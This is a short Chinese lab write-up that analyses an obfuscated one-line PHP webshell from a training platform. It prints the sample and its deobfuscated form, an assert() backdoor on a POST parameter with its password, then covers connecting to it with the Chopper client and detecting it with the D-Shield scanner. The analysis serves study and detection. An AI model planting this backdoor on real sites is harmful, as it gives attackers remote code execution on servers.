WebShell代码分析溯源(二)
WebShell代码分析溯源(二)
一、一句话变形马样本
<?php $POST[‘POST‘]=‘assert‘;$array[]=$POST;$array[0][‘POST‘]($_POST[‘assert‘]);?>
二、代码分析
1、调整代码格式
2、分析代码,首先先把”assert”字符串复制给POST数组,然后又把POST数组array数组,调试代码,搭建php环境(这里使用phpstudy)
3、发现结果输出为assert
4、这样最终一句话变形马就变成这样: <?php assert($_POST[‘assert‘]);?>,密码是assert
三、漏洞环境搭建
1、这里使用在线学习平台墨者学院中的实验环境(WebShell代码分析溯源(第2题)),地址: https://www.mozhe.cn/bug/detail/bFBlRkJteit1TlBLaEZMQWVPM0ZjZz09bW96aGUmozhe
2、代码环境,下载代码
3、找到webshell代码处,然后分析(上面有已经分析过了)
4、使用菜刀连接
四、后记
学习常用webshell扫描检测查杀工具---D盾,网址: http://www.d99net.net/
1、 使用D盾进行webshell查杀
相关推荐
xiaobater 2020-02-02
bluet00 2020-06-25
bigNoseLiu 2020-06-15
Jieen 2020-05-30
酷云的csdn 2020-05-28
Sabrina 2020-04-22
pimshell 2020-04-06
伏雌摘星阁 2020-03-03
懒人的小窝 2011-06-11
Parco的IT运维 2020-02-03
liushun 2019-12-16
本站服务器经过更换2012版后 网站经常被人拿WEBSHELL篡改文件!找了半天也找不到漏洞在哪好在微信好友Carry的帮忙下找出了漏洞,并给出了以下的修改方案我是根据方案3修复的,在这里给大家分享下
SciRui 2019-12-14
jinkun00 2015-08-17
Yyqingmofeige 2019-11-08